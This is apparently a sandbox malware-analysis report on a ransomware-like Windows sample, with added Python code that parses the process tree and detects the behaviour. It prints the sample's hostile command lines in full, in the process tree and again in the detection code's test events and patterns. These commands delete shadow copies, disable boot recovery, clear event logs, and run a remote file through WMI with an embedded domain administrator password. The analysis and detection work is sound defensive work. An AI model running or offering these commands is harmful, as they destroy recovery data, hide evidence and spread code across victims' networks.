Analysis

Max time kernel: 151s
Max time network: 152s
Platform: windows7_x64
Resource: win7v20201028
Submitted: 22-01-2021 10:17

Static task: static1
Behavioral task: behavioral1
  Sample: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
  Resource: win10v20201028

The results on this page are from behavioral1 (the windows7_x64 run).
General

Target: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
Size: 1.0MB
MD5: 3281b2d95e7123a429001400c10ebe28
SHA1: b97308ea9f9c410188d43c34a867fa42c9e9128e
SHA256: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1
SHA512: 2d8829ba0023a0b0f2e3aaa48301f6458fec20e20c019840610f7f862a54615f46de28a5aeb470ae0df5e046d3a8da0310dc29df0b3f60f36ffe4438c469ff11
Malware Config

Signatures

Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: cmd.exe, cmd.exe
    description                                                                         pid   pid_target  process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1476  664         cmd.exe
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  556   664         cmd.exe
  In this trace the cause is WMI rather than an exploit: the sample asks WMI to start cmd.exe (WMIC.exe process call create, see the process tree below), and processes created through WMI are children of the provider host wmiprvse.exe (PID 664), not of the caller. PIDs 1476 and 556 are the two cmd.exe instances that go on to run wevtutil and WMIC shadowcopy delete/bcdedit respectively.
Clears Windows event logs (1 TTPs)

Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes: bcdedit.exe, bcdedit.exe
    pid   process
    1476  bcdedit.exe
    1124  bcdedit.exe
  PID 1476 here is not the cmd.exe 1476 from the previous signature: that cmd.exe had already exited and the PID was reused for this bcdedit.exe child of cmd.exe 556 (see the WriteProcessMemory IoCs).
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
  File opened (read-only) by the sample, 24 drive roots (every letter except C: and D:):
    \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N:
    \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
  The report records them in the order probed: R, Y, B, F, I, Q, K, U, V, L, N, O, T, A, E, G, J, W, X, Z, H, M, P, S.
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious use of AdjustPrivilegeToken (179 IoCs; the listing on this page is truncated)
  Processes: WMIC.exe, WMIC.exe, WMIC.exe (PIDs 1252, 1268 and 1432; the truncated listing then continues with 1252 again)
  Each WMIC.exe instance enables the same privilege set on its own token:
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege,
    plus the unnamed privilege LUIDs 33, 34 and 35 (on Windows these are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege).
  Enabling every privilege held by its token is standard start-up behaviour for WMIC.exe, so this signature fires for any WMIC invocation; it shows that the sample runs as an administrator (the privileges must already be present to be enabled), not that it escalated.
Suspicious use of WriteProcessMemory (49 IoCs)
  Processes: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe, cmd.exe, cmd.exe, cmd.exe
  Unique parent -> child pairs (each pair is repeated 3 or 4 times in the raw IoCs, once per WriteProcessMemory call made while CreateProcess sets up the new child; these writes are ordinary process start-up, not code injection):
    1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe -> 1252 WMIC.exe
    1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe -> 1268 WMIC.exe
    1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe -> 1772 cmd.exe
    1772 cmd.exe -> 1432 WMIC.exe
    556  cmd.exe -> 564  WMIC.exe
    1476 cmd.exe -> 1580, 1392, 2008, 1828, 1992, 1300, 1592, 1724 wevtutil.exe (eight instances)
    556  cmd.exe -> 1476 bcdedit.exe
    556  cmd.exe -> 1124 bcdedit.exe
  Two things to keep in mind when reading this list. First, PID 1476 is reused: it is the cmd.exe that launches the eight wevtutil.exe instances and, after that cmd.exe exits, the bcdedit.exe child of cmd.exe 556, so correlate on (PID, image, time) rather than on PID alone. Second, cmd.exe 556 and cmd.exe 1476 have no recorded parent because they were started by wmiprvse.exe (see the first signature), whose activity is not part of this list.
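The flattened IoC list above is the only place this report records parent/child PIDs, and it has to be read with PID reuse in mind. The following is an added example written for this page, not code from the sandbox: it parses a constructed subset of the "PID X wrote to memory of Y" lines above, drops the repeated entries, keys each node on (PID, image) so that the reused PID 1476 does not merge cmd.exe with bcdedit.exe, and renders the resulting trees. The line grammar, the sample lines and the rendering format are the example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed input: one line per parent/child pair from the WriteProcessMemory
# IoCs in this report, with one of the report's duplicates kept on purpose.
SAMPLE = "8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"
IOC_LINES = f"""
PID 1832 wrote to memory of 1252 1832 {SAMPLE} WMIC.exe
PID 1832 wrote to memory of 1252 1832 {SAMPLE} WMIC.exe
PID 1832 wrote to memory of 1268 1832 {SAMPLE} WMIC.exe
PID 1832 wrote to memory of 1772 1832 {SAMPLE} cmd.exe
PID 1772 wrote to memory of 1432 1772 cmd.exe WMIC.exe
PID 556 wrote to memory of 564 556 cmd.exe WMIC.exe
PID 1476 wrote to memory of 1580 1476 cmd.exe wevtutil.exe
PID 1476 wrote to memory of 1392 1476 cmd.exe wevtutil.exe
PID 556 wrote to memory of 1476 556 cmd.exe bcdedit.exe
PID 556 wrote to memory of 1124 556 cmd.exe bcdedit.exe
"""

# "PID <src> wrote to memory of <dst> <src> <src image> <dst image>"
# (assumed grammar, derived from the lines on this page).
LINE_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) "
    r"(?P<src_img>\S+) (?P<dst_img>\S+)"
)


def parse_edges(text):
    """Return de-duplicated ((src_pid, src_img), (dst_pid, dst_img)) edges,
    preserving first-seen order."""
    edges, seen = [], set()
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised IoC line: {line!r}")
        edge = ((int(m["src"]), m["src_img"]), (int(m["dst"]), m["dst_img"]))
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def reused_pids(edges):
    """PIDs seen with more than one image name. Windows recycles PIDs, so a
    node has to be keyed on (pid, image), never on the pid alone."""
    images = defaultdict(set)
    for src, dst in edges:
        images[src[0]].add(src[1])
        images[dst[0]].add(dst[1])
    return {pid: sorted(imgs) for pid, imgs in images.items() if len(imgs) > 1}


def build_tree(edges):
    """Return (roots, children): roots are (pid, image) nodes that no hooked
    process wrote to, i.e. the sample itself and the cmd.exe instances that
    wmiprvse.exe started; children maps a node to its child nodes."""
    children, targets, nodes = defaultdict(list), set(), []
    for src, dst in edges:
        children[src].append(dst)
        targets.add(dst)
        for n in (src, dst):
            if n not in nodes:
                nodes.append(n)
    roots = [n for n in nodes if n not in targets]
    return roots, children


def render(roots, children, depth=0, out=None):
    """Indented text rendering, two spaces per level."""
    out = [] if out is None else out
    for node in roots:
        out.append("  " * depth + f"{node[1]} (pid {node[0]})")
        render(children.get(node, []), children, depth + 1, out)
    return out


if __name__ == "__main__":
    edges = parse_edges(IOC_LINES)
    roots, children = build_tree(edges)
    print("\n".join(render(roots, children)))
    print("PID reuse:", reused_pids(edges))
```

Run as-is it prints three trees rooted at the sample, cmd.exe 556 and cmd.exe 1476, and reports PID 1476 as carrying both cmd.exe and bcdedit.exe. The same parser can be pointed at a full Triage export; the only thing to adjust is the line grammar if the report format changes.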
Processes

Indentation follows the depth shown in the original tree (1⤵, 2⤵, 3⤵). PIDs are taken from the WriteProcessMemory IoCs above where the mapping is unambiguous. The sample never spawns cmd.exe for the destructive commands directly: it asks WMI to do so (WMIC.exe process call create), and WMI starts the requested process from the provider host, so those cmd.exe instances appear as separate top-level entries whose parent is C:\Windows\system32\wbem\wmiprvse.exe (PID 664), exactly as the "Process spawned unexpected child process" signature reports.

C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe  (PID 1832)
  Command line: "C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"
  Signatures: Enumerates connected drives; Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\wbem\WMIC.exe  (PID 1252 or 1268; the report does not say which)
    Command line: "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'
    Signatures: Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\wbem\WMIC.exe  (PID 1252 or 1268)
    Command line: "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'
    Signatures: Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe  (PID 1772)
    Command line: "C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
    Signatures: Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\Wbem\WMIC.exe  (PID 1432)
      Command line: wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
      Signatures: Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe  (PID 1476; parent wmiprvse.exe)
  Command line: cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"
  Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory

  C:\Windows\system32\wevtutil.exe  wevtutil cl "security"
  C:\Windows\system32\wevtutil.exe  wevtutil cl "windows powershell"
  C:\Windows\system32\wevtutil.exe  wevtutil cl "security"
  C:\Windows\system32\wevtutil.exe  wevtutil cl "Application"
  C:\Windows\system32\wevtutil.exe  wevtutil cl "HardwareEvents"
  C:\Windows\system32\wevtutil.exe  wevtutil cl "System"
  C:\Windows\system32\wevtutil.exe  wevtutil cl "Setup"
  C:\Windows\system32\wevtutil.exe  wevtutil cl "Setup"
  (eight instances; the WriteProcessMemory IoCs record their PIDs as 1580, 1392, 2008, 1828, 1992, 1300, 1592 and 1724, in that order. The duplicated "security" and "Setup" clears are in the sample's own command string.)

C:\Windows\system32\cmd.exe  (PID 556; parent wmiprvse.exe)
  Command line: cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory

  C:\Windows\System32\Wbem\WMIC.exe  (PID 564)
    Command line: WMIC.exe shadowcopy delete /nointeractive

  C:\Windows\system32\bcdedit.exe  (PID 1476, reusing the PID of the cmd.exe above after it exited)
    Command line: bcdedit.exe /set {default} recoveryenabled no
    Signatures: Modifies boot configuration data using bcdedit

  C:\Windows\system32\bcdedit.exe  (PID 1124)
    Command line: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    Signatures: Modifies boot configuration data using bcdedit

C:\Windows\system32\vssvc.exe  (the Volume Shadow Copy service, started on demand to service the shadowcopy delete request)
  Command line: C:\Windows\system32\vssvc.exe

Two points worth noting from the tree. The shadow-copy deletion and the two bcdedit changes (disable the recovery environment, ignore boot failures) are the usual pre-encryption step that stops Windows from offering a restore point or recovery prompt after the sample has run, and the eight wevtutil cl calls remove the event logs that would record it. The third child (cmd.exe 1772) is the only one that reaches beyond the host: it runs wmic against node 0.0.0.0 with an embedded domain Administrator credential for corp.joycone.com and asks the remote WMI service to register, run and immediately delete a scheduled task (sz40) that executes \\corp.joycone.com\NETLOGON\sihot.exe as SYSTEM at logon. The hard-coded node, domain, credential and NETLOGON path suggest a build tailored to one victim environment; in the sandbox, with no such domain reachable, the remote call cannot succeed, which is why nothing further appears under it.
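The behaviours in this tree (a shell spawned by wmiprvse.exe, shadow-copy deletion with bcdedit recovery changes, wevtutil log clearing, and remote WMI execution with embedded credentials that registers a task from a UNC path) map directly onto process-creation rules. The following is an added example written for this page, not code from the sandbox or from the sample: it runs six constructed Sysmon-style process-creation events, five transcribed from the tree above (the cmd.exe 1476 command line abridged, and 1252 standing in for whichever of the two WMIC.exe children ran the shadowcopy command) plus one benign wevtutil query as a control, through a small rule set and reports the matching PIDs. The field names, the control event's PID 4242, the helper names and the ATT&CK IDs in the rule names (current numbering, not the v6 numbering of the matrix below) are the example's own.

```python
import re

SAMPLE = "8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"

# Constructed Sysmon Event ID 1 style records transcribed from this report's
# process tree; PID 4242 is a constructed benign control that must not fire.
EVENTS = [
    {"pid": 1252, "image": r"C:\Windows\SysWOW64\wbem\WMIC.exe", "parent_image": SAMPLE,
     "cmdline": "WMIC.exe process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & "
                "bcdedit.exe /set {default} recoveryenabled no & "
                "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'"},
    {"pid": 1772, "image": r"C:\Windows\SysWOW64\cmd.exe", "parent_image": SAMPLE,
     "cmdline": "cmd.exe /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\\Administrator' "
                "/PASSWORD:'Admin$joy' process call create \"cmd.exe /c schtasks /Create /F /RU System "
                "/SC ONLOGON /TN sz40 /TR '\\\\corp.joycone.com\\NETLOGON\\sihot.exe' & "
                "SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F\""},
    {"pid": 1476, "image": r"C:\Windows\system32\cmd.exe",
     "parent_image": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "cmdline": 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "System"'},
    {"pid": 1580, "image": r"C:\Windows\system32\wevtutil.exe",
     "parent_image": r"C:\Windows\system32\cmd.exe", "cmdline": 'wevtutil cl "security"'},
    {"pid": 1124, "image": r"C:\Windows\system32\bcdedit.exe",
     "parent_image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 4242, "image": r"C:\Windows\system32\wevtutil.exe",
     "parent_image": r"C:\Windows\system32\cmd.exe", "cmdline": "wevtutil qe Security /c:5"},
]

SHELLS = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}


def _base(path):
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Each rule gets the raw event and its normalised (lower-cased, whitespace
# collapsed) command line. Rule names carry the ATT&CK technique they map to.
RULES = [
    ("wmi_spawned_shell (T1047)",
     lambda e, c: _base(e["parent_image"]) == "wmiprvse.exe" and _base(e["image"]) in SHELLS),
    ("shadow_copy_deletion (T1490)",
     lambda e, c: re.search(r"\b(wmic(\.exe)?\s+shadowcopy\s+delete|vssadmin(\.exe)?\s+delete\s+shadows)\b", c)
     is not None),
    ("boot_recovery_disabled (T1490)",
     lambda e, c: "bcdedit" in c
     and re.search(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", c) is not None),
    ("event_log_cleared (T1070.001)",
     lambda e, c: re.search(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", c) is not None),
    ("remote_wmi_exec_with_credentials (T1047)",
     lambda e, c: "/node:" in c and "/user:" in c and "/password:" in c and "process call create" in c),
    ("scheduled_task_from_unc_path (T1053.005)",
     lambda e, c: "schtasks" in c and "/create" in c and re.search(r"/tr\s+'?\\\\", c) is not None),
]


def evaluate(events):
    """Return {pid: [matching rule names]} for every event that matched a rule."""
    hits = {}
    for e in events:
        c = " ".join(e["cmdline"].split()).lower()
        matched = [name for name, pred in RULES if pred(e, c)]
        if matched:
            hits[e["pid"]] = matched
    return hits


def remote_wmi_target(cmdline):
    """Pull the remote node and account out of a 'wmic /node:... /user:...'
    command line for triage; the password is deliberately not returned."""
    m = re.search(r"/node:'?([^'\s]+)'?.*?/user:'?([^'\s]+)'?", cmdline, re.I)
    return {"node": m.group(1), "user": m.group(2)} if m else None


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, names)
    print(remote_wmi_target(EVENTS[1]["cmdline"]))
```

The WMI rule is the one that matters most for this sample: a shell whose parent is wmiprvse.exe is rare on workstations and is exactly how this sample hides its cmd.exe children from the parent/child lineage of the original process, so alert on it even when the command line itself looks benign. The control event shows why the wevtutil rule matches only the cl/clear-log verb and not every wevtutil invocation.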
Network

MITRE ATT&CK Matrix (ATT&CK v6)

Downloads
Entries are named memory/<pid>-<index>-<start>-<end>-<kind>.dmp. Only two are real memory-region dumps (8KB each, from PIDs 1580 and 1832); the rest are mapping dumps recorded at address 0.

memory/564-7-0x0000000000000000-mapping.dmp
memory/1124-25-0x0000000000000000-mapping.dmp
memory/1252-3-0x0000000000000000-mapping.dmp
memory/1268-4-0x0000000000000000-mapping.dmp
memory/1300-18-0x0000000000000000-mapping.dmp
memory/1392-10-0x0000000000000000-mapping.dmp
memory/1432-6-0x0000000000000000-mapping.dmp
memory/1476-24-0x0000000000000000-mapping.dmp
memory/1580-8-0x0000000000000000-mapping.dmp
memory/1580-9-0x000007FEFBF41000-0x000007FEFBF43000-memory.dmp  (Filesize 8KB)
memory/1592-20-0x0000000000000000-mapping.dmp
memory/1724-22-0x0000000000000000-mapping.dmp
memory/1772-5-0x0000000000000000-mapping.dmp
memory/1828-14-0x0000000000000000-mapping.dmp
memory/1832-2-0x0000000076371000-0x0000000076373000-memory.dmp  (Filesize 8KB)
memory/1992-16-0x0000000000000000-mapping.dmp
memory/2008-12-0x0000000000000000-mapping.dmp